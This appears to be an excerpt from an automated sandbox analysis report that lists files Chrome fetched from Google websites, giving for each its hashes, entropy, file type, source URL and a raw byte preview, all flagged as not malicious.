                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:qTCJLxoRucN+OjTcvXjXRH0DDmJS4RKb5KVEriqGQcFFuIOUoLRFQcRUlypqURL2:qTCJFou1i3mc4slTHmcIgtbNRLprTY
                                                                                                                                                                                                                                                                                          MD5:10C8AED69BDAED5FA3120401608F0899
                                                                                                                                                                                                                                                                                          SHA1:6E5A7025855BFB087B556203D18D24843EBBF804
                                                                                                                                                                                                                                                                                          SHA-256:6F62D85EF6ED53BC368C77B6A47394A41F3B16D9E07D0B8761E726784EEBCEB4
                                                                                                                                                                                                                                                                                          SHA-512:E2BAD6E1B1AF68AB4511264A4A8506FFFC4B07936BA3D1C5E809926E7E1741AA0DC1E7991848BD21380F12C962E6C6A7BA74FE82FE24EE762AC736A1DE29B045
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://about.google/assets-products/img/glue-icon-expand-more.svg
                                                                                                                                                                                                                                                                                          Preview: <svg id="expand-more" width="18" height="18" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path fill="#5f6368" d="M5.41 7.59L4 9l8 8 8-8-1.41-1.41L12 14.17"></path></svg>
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):150178
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.955382794381521
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:uKLqcd+4OsWDj+gsc6+nPtdWsxmKk1JY262bnjS0jnI6phW8GVOe98c:uLQ+4OwcjnPtdWAk3D62bFdqXZ
                                                                                                                                                                                                                                                                                          MD5:6C171E0E84327176E93A4466E645B375
                                                                                                                                                                                                                                                                                          SHA1:E3BF830C55F5E586B2DD7BA72CD2D051A6FEE598
                                                                                                                                                                                                                                                                                          SHA-256:896363E823871ABF44C98366F8AB6250EC6102109CD8C9792DF41D7E8E0CF999
                                                                                                                                                                                                                                                                                          SHA-512:A48C435EC0D2B2022A0A8DC2284191F55BE386B8A52E8B48FE5CBA57BA02712CD4B0F7476143225D0474F92043E4BD618870214BD21F1CAE494E5FC636ECB099
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF.J..WEBPVP8L.J../.....u!...B.m..?...""y^.(F..(.......>.M.H.m[.#........ym....(.bfff....03#....%.p....6..[.$K.$.B.........~...w7..].kK.$......P...;..8.n_.....{......mTv".....$..].5..\..."2.{.3f.......y........L.....3.j.......{...J...Lw..oI.,I.l.Y.#2../..s{..p....y....3k..*3.T.mm.7..y=/} .j.3....33'..:i(.....u..(.j....c..).ty|.>...I......bwWkf.fvfm.l....6.m.n..W..........#..........$I.$I.E$.f....9....u}..k....p7..m.j.m..k.c.)i........~fF...1....ZK....V...Z.$.^.....m[&..u...EDb..$.."[2.l.-s...af\k.7._`^.3.8.f..v..A.X*..../.7 .2.....mE.$.Z.\.Q0s........bxX...f.."r..-.j.$k}........R...T....0n\s...l+q.I.$.`........................................................................................................................................#xj.).Lz..e....|.9.&...M.y.......p...i....x..aC....s..."....L..tz...`.....BH.....x.......x.~..H.$g.+Y..H...@0.C8....I-..J..9(..Q.[....L.....;...1G.6.m.a3 ...`.5....3.d#8...5.A. ..L$!G..T.:..L.h..8..<T....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2659
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8905442131677255
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:ijiUY2f6fVz+e6SX/uFRxP1Z9k5Le5+DROGSHFQuD6sQbJ4ftC7IbYjFK:iu52ifVqe6FFRxPaMYGHFQelPQ78UK
                                                                                                                                                                                                                                                                                          MD5:C399BEE3FB59500877DCEA2824E85878
                                                                                                                                                                                                                                                                                          SHA1:51B4BDB550A88F67B99A56B42B6CF10AF76AA9F3
                                                                                                                                                                                                                                                                                          SHA-256:3CF5597043FA5646F412B52D6B1FE92529801DCEA6858252724002F740230875
                                                                                                                                                                                                                                                                                          SHA-512:5F564E79C7124F770604BC07D666F5635AE94565D3D03956E4CBEA2910FA2E02736ED4E1365D7907E18C18BD5B0966BE2F1D6165E0A314541977F2F891D78E40
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..mp\U.......6.K_..T.i.V,....L./:~@.Kt.....Gg.......G.G?0U....CF....A..M.A.i)mc[.mh.M....?l.`_7{......-.>....s.=........p8.....p8....QsT..w..Z.........T...BkM...=z...#...A..K...e....g.e.WO.0.=...V.S:w.P.d.{..9..V..N....~..}.l...!...'w3.#.qDk.........X/./N...\.s........{..Z*_\....!...$.'......1.q......#...'w+.\...F.Tl..1.|~..U7>...dmpGOn5.C.-.'..v.~.bs.cL....%4I.._..=Jk...W,_...s.SW..2..'......z......^...r...9l..P..M..Lh.F...^~....m5uX.....Q......k/>..&.........ba.S.aXc.p.M...-..uC..U.=o.U.e.C..uCC..*;.A..M...;-.....D......4....5x.e|]`0.i.G.E.y....._V9l.wt7U.6W.0...4......b...Y...a......X..\.0..."=...y.....t'.m..c...e>-s[...P...{^.o].6...|.P.Xc"..w.Ek.j..=.p....EB...;......d..b.Z.z.z..$a4.....O....v)Eb{k;...M....R9.1..O.j.z..e(..Q..k...D...?z......u..6...>V..qAk...8.G.322L1(.T...7.i....ny......VUy....*..J.......K...G..`d.0..c.RMc..x....F...p8.....v..LZ......?.aUX........yq..t.c.&.u.)`...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 284486
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):83178
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9966356720361516
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:sas1AeRdmMaLdPhemAhxicfHwBG7d2KQIH5VKtQ/pv7KkrEKCL9DdxVEqT2StqgB:sas1Ae+MaLdPhemAhxiMH7R2qHjKa/pw
                                                                                                                                                                                                                                                                                          MD5:B55962FF3089751CE9205387F2657AAA
                                                                                                                                                                                                                                                                                          SHA1:8BA2A24AACE703DEABA4DAFA635DDA3D5CE53001
                                                                                                                                                                                                                                                                                          SHA-256:D857AFC0DF8AEFF67FB8237EFA47A060BE672AE9698401254EB82FC3A5CF8807
                                                                                                                                                                                                                                                                                          SHA-512:B10253DA20398A9DB645A735E408158616155FEA017B12D327C0E8FC35E1EE01430F15D9E6B225ADA9E02365F6752782F1A4AF8E36BE32F5261D633C80CA8C63
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://sustainability.google/static/index.min.js?cache=47ade0f
                                                                                                                                                                                                                                                                                          Preview:...........}i{Z..w..L.V.h.Kv..4..A..$.P.J.....F.1..mE.....j....s.....5.Z..ZU......|V.v?/....w..(.Z/...w.),EU...........Q././.p.u..bB..............2Z..g....?WC......G...z.z.{.W1.y=..ex.\G.p=_61..i..S....{....N..&,M...ztp?.....S8....Uog..CY....6...Q.x?........$.a..m....&2..u'......p<......."..s.io>..........*Q..,.w.+.....o....m;O.x9.fNm8_.xzA.z.....%Zw.X,.,+.~iq...z%.i...q..$.-.lxn<[..Y..^..?..+.8^.J>\.6.q.v...m..Q}....g..Y.....=..?^....*....'...E...{.:y..<9.*n....I.._...[.u..{~.:m......].._......4.......N.u.k>.....u>....H.~......kq........ ..s.B...WZ,..9am54.0.>.z...v./Af..o.Q..8Z.....9....p<,..*.....(.....V@.>T...f1 lng........PX.....8..Zg4^mo...0H..<.......h2.....g3..=.....Uvv@f.4.....`....N...Z........r.9.X.A...p6..s N......+...'...L.5.Pt......N..U}D4.hh_~.D.0..)..>;....N.?..fio.,~..}......|r7.O&.._..0.w...]...dh.Nv..{5..?V.......s.......}o{.......M...X...j..p.*..q..O)..b.2xcG....`...d...K...x. ..r....`gG......z/.CP.\..HW.W.W.......
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):102
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.168187299251515
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:VG4mZcQojRgss5C4JUkDZHG6JElJWdHZ+4LQpNYe:VpauCfC4TLJkWdHAHpue
                                                                                                                                                                                                                                                                                          MD5:2A12C2CD05838E0D14152747B29F805F
                                                                                                                                                                                                                                                                                          SHA1:09F0498C784A7FF215117FE271950E2B31206C73
                                                                                                                                                                                                                                                                                          SHA-256:C8F96A2031DE4E4947F6545633195A61E24D45715E02C164B13703014D53F0F0
                                                                                                                                                                                                                                                                                          SHA-512:C000B47A9F2B0F78CC271EFC47113C541AF2EE8DBD53D2E516E22ADE3561C9AA1A31188ACA549A2D997B4FEC8096F591E6FB1F8B7782535408A999682C49DE75
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:)]}'.22;["bcT2Zt_uMYWMi-gPgIWCsAc","2085"]c;[2,null,"0"]1b;<div jsname="Nll0ne"></div>c;[9,null,"0"]0;
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 700x366, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):27590
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.973501794196893
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:1MF8ms6QyV+rKzgvbWY2+EUFeWjOO9r/MJ:O8VyV+rAgBxEURi+Q
                                                                                                                                                                                                                                                                                          MD5:003E22A4E226CC7E9DF7B3FEA1D2AB6A
                                                                                                                                                                                                                                                                                          SHA1:6521BD0E61B6590D7B5D4D4D9B5088B0AF176A5B
                                                                                                                                                                                                                                                                                          SHA-256:BF626BCC4A60276E5E81BB74106C27679EBE66B6321E57B72BD0E79BD31EB38B
                                                                                                                                                                                                                                                                                          SHA-512:DF71DE4CBE1B8D7E25EBBA4316639253BDDD75E0F7064651D37BF6AA8C99561F35593AD475A4868EFAB913A968393527BBEE802BE25EB78A5A6A61127949E52A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF......................................................................................................................................................n....".........................................T......................!..1AQaq......".....2...BR...#br$t.....%3CSTds...4c...5DE...................................7........................!..Q1Aaq.."...br...#$2...34BR............?...MY...e..5...V..QN.-].qEgpV...Ji.[..E ..zF!M....RVd..4.O;.A.J.E%.A[..am....*wAY..0.(.....F.l.si.).@PS.ZS-..h....N)+p..A.wkq........E.Inm$..h...)..QkU..M......Ef;&AM+h....5..h.(#...=.3...u..V.M0...l.h".?.[.+;.f+H.E?.-.3...<aS.2..`..h..E\0.k).gr..C..<..fV7......8.oP.....*.E1.?p../.<?dPaJ...............6.W....t]2<a.M...s.d..OA.g..f.o..#..S.`..F..l...%gc9+Z....!....P.B..gG1..TL...B-...7..!@...{Q3...8. ..e..Fs.L.2.......m.30.i..jhLZ...h.().Y.6..e..}.=...).2.2.I.k..j.v.....gDQS.E.e...I3h..C[F!A..o........;...z}.n.gp....b........TvQ...aW.(..Y...y>...H"p..._N...@....7...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 878
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):474
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.507645663882797
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:X/XIuMaZC88VSp00hhAmldhNWO3OXWru3pIgAJchYy:XvIDaZCohtf5El3pIkhh
                                                                                                                                                                                                                                                                                          MD5:88E32922D278F4DC8034AC9D2C192518
                                                                                                                                                                                                                                                                                          SHA1:1404165EE77D8DB447E4E6B8CCFA7D2AD92E4CAC
                                                                                                                                                                                                                                                                                          SHA-256:C64E445A2D557C323C6F44705868F223584F7C5D493F583555A9FE6A5CEFC075
                                                                                                                                                                                                                                                                                          SHA-512:92BA581D88691E149C3ABAC2CF35E9A408865B1EA2E3EA2568C8F62EC0D2C488D3C919FA2F1DC5DD74D821A150A350D7FF4F4CA8FC83E8DA998D7102B8D51F27
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://recovertogether.withgoogle.com/static/images/icons/linkedin_original.svg
                                                                                                                                                                                                                                                                                          Preview:..........\S.n.@...+..si>.YD9D._|....V,..m$.../.......,g.\R..q?.......8...m^...z..<:t.....x:u.|9..}.>.?:?.n....4M0.\..+F..........P}..s.:?..e.....x..o...U.........Q.R..D....p..)..dLNy9.......,.P%J.c..7.4/...V.,...B-"k....%.....1...1.?.F.-?..W..6.......d.7.9...%..h..V.n. .z\...K.!.@..cgI.e.1...!7..U.?...("....O)H.../..4.....a.o.../...6...X;17....m.2.%n..m.!R..p-z.PS..is.=.B.~..h .d..{....qf...,.Nr...KD.T..F...v1.[...AzT..[..1...Wz..uxy...........}n...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1840x630, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):39755
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.574348657479085
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:LYU5cIupDSkdi0l48StkLA1bAjtenAB7MGrv+/:TruJSkwIlDMBAjtenAB7xrW/
                                                                                                                                                                                                                                                                                          MD5:3972435031D02D6FF6CB8A5F2A786094
                                                                                                                                                                                                                                                                                          SHA1:0AE6D027CD444F4C4605B21486E919C310FD92D3
                                                                                                                                                                                                                                                                                          SHA-256:BA7E54CBF5CA0A4BBDAA39254C20EB8490ADBBA42CD0A14B5B0001A6AA51A26D
                                                                                                                                                                                                                                                                                          SHA-512:18BC5D61EC062605ADDB6B06FBA90283E24CA3D6D3333D3803EFCFCFEA100899AF23A5E21649BD0EE751001CF7402508D0817CB570D0243A0BBE4C40657B11BE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................v.0..".................................................................................@............................................................................................?+7r..O3q.3w.!..'..s......].v.7..^.qxQ..Z....@y.>.Y.O...4..|9.p.~.h..m..\.x.........?..i._.h.....YU.!...........................................................H...G....,5.....U..+.C....l..,...`A.z.V},..[.......;MX.e".D..I....[..y...kGYl..2...>..Ec?.hf...+.........Z..1..C3..fw.....5.c..[...............................................................".".-.+.....2.[i7jN4.........l.N......Y..........O...k.ff..+.g..5..9...........*IH.<.u.....c.[.vm..........#..;..>.X.}.:..Q.zI[.Q.R.A..rV...?...........................................................r.q......Xk..u....'.W.......T..'......L.......T|.6..R+y.....\.Q.l...d.....d|>....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5805
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9542006310437126
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:t9UzyN3uV9rFvd89BSK+b+n3P/WB64548U3zuH1pgD/ln5KCKH:/U2N+V9rj8DSK+bB5DKuH1oln5lq
                                                                                                                                                                                                                                                                                          MD5:D0656A971972F0807AB746BE522ADD05
                                                                                                                                                                                                                                                                                          SHA1:5DEB386A5C5481D9A4AE91E37E175A4E656AE245
                                                                                                                                                                                                                                                                                          SHA-256:C7B0BC63C6F5631DADD177E4EA287231713A0FF78A36213806ACC9BF760A4D4E
                                                                                                                                                                                                                                                                                          SHA-512:6DC7991439E91FF4901ACF4AB19FBFC83A9B9E5CB26ABB9987FA72937C84609407A894806B2E7802419C7A550C7F3075DCE0DA33063705ECC51F8F957A6D3D79
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/cYinAwcg0UYHuljAGk0_ZbSq_FJb2iMU2TTPM0Y7ORjDNMDPH1ltJbX6573rHuHu6poQ796iQ8t3s-6PmfexI4qRBNs7ruEpWAmVeBLzeJWkFgd0ar0=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....dIDATx..y....?.{o/4K./..(.`.d......8..I.8.3.e.%...8nAt.h.'.8O6......q.lFE.D.PD.f...Uu......t..[....y.~.....U.:...s.D..%J.)Rh.r..*...2M5$..16.5.. .D...E."&....'..=/u.WnK..@P....=Y.*=kf..Vc..F..F9*i..~80..:T..P...A.BU2j.RF....m.........1...<.W.]...S.."=M..:..H...&.z...?...*...H.[RE...*!i...k..".;.'b.6*o".5..$..>...0...9=A.:o.D\..:ew&..Q..w>v].........*....D....H..<.f..^..sF.....3OD......iIk..D..........`w.t.. .pyQ.[..H...)6.c:....F..#.....DE.......V.{...,.'V>.4.......g.8....fnK.c.FD)>a[#.~....=.%..!Y....-.{..._&.0..._V...R......=..2 .nu..7....]..K...PT..nE..mO..y..*lk..X......<.j1.*..%..z..k|.....a[#.U..1..Y.......C>.....w.ra.$...k..'....}yr.?..~....?.....c8.m......y.yj....|..=c.u.}{S...Pm.b...j}J..G>.....E*.^...... ..B.c>u..=..omj..["O...HGe+2.u...H8wn......m..H.6......x.,_.;.;..)z........%q..*$.qj...8....8=.y.. |sW..4.s;-.A....>Y..7Q..e.-:o........s...I..s.,_u.P.....`=c.4..+.%q;...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1660
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                                          MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                                          SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                                          SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                                          SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1642)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2151
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1810189657952215
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:OdWYrD+u2NnijsMnVOil6PSByN98s9mUoUHoro:svsMnVODSBywtk6o
                                                                                                                                                                                                                                                                                          MD5:A5408C6762C59EEE8E1AAAD5FF00481B
                                                                                                                                                                                                                                                                                          SHA1:0373850652D0E809878C4918E11C65A9B270DF4E
                                                                                                                                                                                                                                                                                          SHA-256:0666F89133D0E1D25897E51F31D3FFDE6F799A00106465FEE031BC9D6072E703
                                                                                                                                                                                                                                                                                          SHA-512:67279DD4390DD2D143A59D1E4B9C6BE1CAE9CD5D9775D239EF5ED036B3F354B4DEF97885694F44AD93884CFF238D1E8D220309F727A47E7FA030315EFF3F57C9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:import{r as g,s as u,x as c}from"./ycaG4YXp.min.js";import{e as b}from"./0XPwTFcg.min.js";import{n as e}from"./IYoTYjYE.min.js";import{o as f}from"./5Ss99t85.min.js";import{o as d}from"./RpI-OtYr.min.js";const v=":host{display:block;--bds-group-gap: 24px}.container{align-items:var(--bds-group-align-items, center);column-gap:var(--bds-group-gap);display:flex;flex-flow:row wrap;justify-content:var(--bds-group-justify-content);row-gap:var(--bds-group-row-gap, var(--bds-group-gap));width:100%}.positionLeft{--bds-group-justify-content: flex-start}.positionCenter{--bds-group-align-items: center;--bds-group-justify-content: center}.positionRight{--bds-group-justify-content: flex-end}.positionApart{--bds-group-justify-content: space-between}.verticalPositionTop{--bds-group-align-items: flex-start}.verticalPositionBottom{--bds-group-align-items: flex-end}.verticalPositionCenter{--bds-group-align-items: center}.noWrap{flex-wrap:nowrap}";var m=Object.defineProperty,y=Object.getOwnPropertyDescript
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (561)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):31666
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.397564672661937
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:npzjVkjElIVonxb6qOq+WZT8HjiyUv5aYe9hiVw6rCRNbzgM/BwNwgmx/tXTxw4k:nxjNl3x8XBHa4iVwmytzimx/hcg6/K3w
                                                                                                                                                                                                                                                                                          MD5:B0A74586B183DB7082EA48B6EA43EDE3
                                                                                                                                                                                                                                                                                          SHA1:5CEC77CD9C2A7EC472327533B0E32D2D5DA8634D
                                                                                                                                                                                                                                                                                          SHA-256:36CB859BE5A639C678F317D76C5C589DA1B5E08820FCCE41D67C38B517EFA959
                                                                                                                                                                                                                                                                                          SHA-512:88A1BA500A6CA668014C54D442DCA1487C1FFBE0E57BAA53A4F4E9C0038F12B981F3A1FC38B598EA4822EB0E086FAF0A4C5DC8601C9BB91C2B6B6BFC3E0945A2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:(function(){'use strict';var q;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}.var r=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}.var t=ba(this);function u(a,b){if(b)a:{var c=t;a=a.split(".");for(var d=0;d<a.length-1;d++){var g=a[d];if(!(g in c))break a;c=c[g]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&r(c,a,{configurable:!0,writable:!0,value:b})}}.u("Symbol",function(a){function b(k){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(k||"")+"_"+g++,k)}.function c(k,e){this.g=k;r(this,"description",{configurable:!0,writable:!0,value:e
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7312)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):7313
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.220242897129581
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:39cfMDD/MtzNcAckTY4aTyfsw3k9h9Fbv7woVSslTD7yVYq8b5ruDn:35DHEY4aTy0w3krkqJd7yItub
                                                                                                                                                                                                                                                                                          MD5:C3C6072E52B261F2A087E42626C49812
                                                                                                                                                                                                                                                                                          SHA1:C2184D5E3ECF76A2924C243472683BBC206EEB94
                                                                                                                                                                                                                                                                                          SHA-256:29F60A110A7068232C71C77E447D04EB85B9DF16B4AC555E2B8D427BEBAFFB3B
                                                                                                                                                                                                                                                                                          SHA-512:06C88912FCBA138F9A060513658CFE9D8889D5CD9DF3EBB55254B5954065896154FA5D804DD1BE8743837D917C1E48CB329C9940DD3A094C7E275608CC3253FD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:function h(){return/iPhone|iPad|iPod/i.test(navigator.userAgent)||m()}function p(){return/Android/i.test(navigator.userAgent)}function m(){return navigator.userAgent.toLowerCase().indexOf("macintosh")!==-1&&!!navigator.maxTouchPoints&&navigator.maxTouchPoints>2}var u=class{constructor(){this.loadedScripts={},this.disposed=!1}load(t,e){const i=this.loadedScripts[t];if(i)return i;const s=new Promise((o,a)=>{if(e.test()){o();return}this.renderScriptTag(t,e);const r=Date.now(),c=e.timeout||5e3,l=()=>{if(this.disposed){a("script loader is disposed");return}if(e.test()){o();return}if(Date.now()-r>c){a(`failed to load ${t} due to timeout`);return}window.requestAnimationFrame(l)};window.requestAnimationFrame(l)});return this.loadedScripts[t]=s,s.catch(o=>{console.error(`failed to load ${t}`),console.error(o),delete this.loadedScripts[t]}),s}renderScriptTag(t,e){const i=document.createElement("script");if(e?.attrs)for(const s in e.attrs){const o=e.attrs[s];i.setAttribute(s,o)}i.src=t,document.b
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):8691
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.966392939246853
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:VPQ2AUtx8hX0Y3ATP9I6b0W1zahIgqVfzEbhzX6zvZ724hTHV:gUtO92Oi0W1oI5VLElGzvZ7pHV
                                                                                                                                                                                                                                                                                          MD5:B194F96127E442BCD553601D72DA4950
                                                                                                                                                                                                                                                                                          SHA1:003FB7E16FF875F8735E324438AD792D4F5B5C7B
                                                                                                                                                                                                                                                                                          SHA-256:3C03DE21A818828C0BC4CA0660C31A2B216BF5090CF4B177DDBF507392A693F1
                                                                                                                                                                                                                                                                                          SHA-512:86FD62B99C25A7866E758BDF1545C9D0671E1AA0B45E027E05F64931E4C651A7DF5DD5594791D9243A1B5FF93F26AC5822DC36A5CC9752D74A015DE6FE096937
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/9ks6e2i7ubrVUEkBwpoJeXTceixbWT3ppLdca04jQg6VPMqXiz6B8KEeczJhnRWmjR453_UREmwtS2jP8-yNq-pU5cEDTbEU6Nqb=h120
